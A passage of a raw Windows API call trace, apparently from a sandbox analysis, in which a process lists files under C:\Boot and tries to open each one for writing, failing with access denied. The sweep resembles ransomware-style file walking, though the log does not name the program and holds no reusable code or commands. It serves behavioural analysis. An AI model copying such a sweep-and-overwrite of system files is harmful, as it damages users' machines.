lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0082.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0082.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.755] AreFileApisANSI () returned 1 [0082.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bootvhd.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bootvhd.dll", lpUsedDefaultChar=0x0) returned 20 [0082.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.755] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.756] AreFileApisANSI () returned 1 [0082.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0082.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a908 [0082.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\bootvhd.dll") returned 20 [0082.756] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.756] GetFileType (hFile=0x334) returned 0x1 [0082.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0082.756] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.756] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.757] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.757] CloseHandle (hObject=0x334) returned 1 [0082.757] AreFileApisANSI () returned 1 [0082.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0082.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ac98 [0082.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7ac98, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\bootvhd.dll") returned 20 [0082.757] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.757] GetLastError () returned 0x5 [0082.757] GetLastError () returned 0x5 [0082.757] SetLastError (dwErrCode=0x5) [0082.757] GetLastError () returned 0x5 [0082.757] SetLastError (dwErrCode=0x5) [0082.757] GetLastError () returned 0x5 [0082.757] SetLastError (dwErrCode=0x5) [0082.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac98 | out: hHeap=0x20000) returned 1 [0082.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0082.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.758] AreFileApisANSI () returned 1 [0082.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\cs-CZ", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\cs-CZ", lpUsedDefaultChar=0x0) returned 14 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.759] AreFileApisANSI () returned 1 [0082.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0082.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\cs-CZ") returned 14 [0082.759] CreateFileW (lpFileName="C:\\Boot\\cs-CZ" (normalized: "c:\\boot\\cs-cz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.759] GetLastError () returned 0x5 [0082.759] GetLastError () returned 0x5 [0082.759] SetLastError (dwErrCode=0x5) [0082.759] GetLastError () returned 0x5 [0082.759] SetLastError (dwErrCode=0x5) [0082.759] GetLastError () returned 0x5 [0082.759] SetLastError (dwErrCode=0x5) [0082.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.759] AreFileApisANSI () returned 1 [0082.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\cs-CZ") returned 14 [0082.759] CreateFileW (lpFileName="C:\\Boot\\cs-CZ" (normalized: "c:\\boot\\cs-cz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.759] GetLastError () returned 0x5 [0082.760] GetLastError () returned 0x5 [0082.760] SetLastError (dwErrCode=0x5) [0082.760] GetLastError () returned 0x5 [0082.760] SetLastError (dwErrCode=0x5) [0082.760] GetLastError () returned 0x5 [0082.760] SetLastError (dwErrCode=0x5) [0082.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.760] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0082.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.760] FindFirstFileExW (in: lpFileName="C:\\Boot\\cs-CZ\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0082.760] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.760] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.761] AreFileApisANSI () returned 1 [0082.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.762] AreFileApisANSI () returned 1 [0082.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0082.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30 [0082.762] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.762] GetFileType (hFile=0x430) returned 0x1 [0082.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.762] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.762] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.763] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.763] CloseHandle (hObject=0x430) returned 1 [0082.763] AreFileApisANSI () returned 1 [0082.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0082.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30 [0082.763] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.763] GetLastError () returned 0x5 [0082.763] GetLastError () returned 0x5 [0082.763] SetLastError (dwErrCode=0x5) [0082.763] GetLastError () returned 0x5 [0082.763] SetLastError (dwErrCode=0x5) [0082.763] GetLastError () returned 0x5 [0082.763] SetLastError (dwErrCode=0x5) [0082.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.764] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0082.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 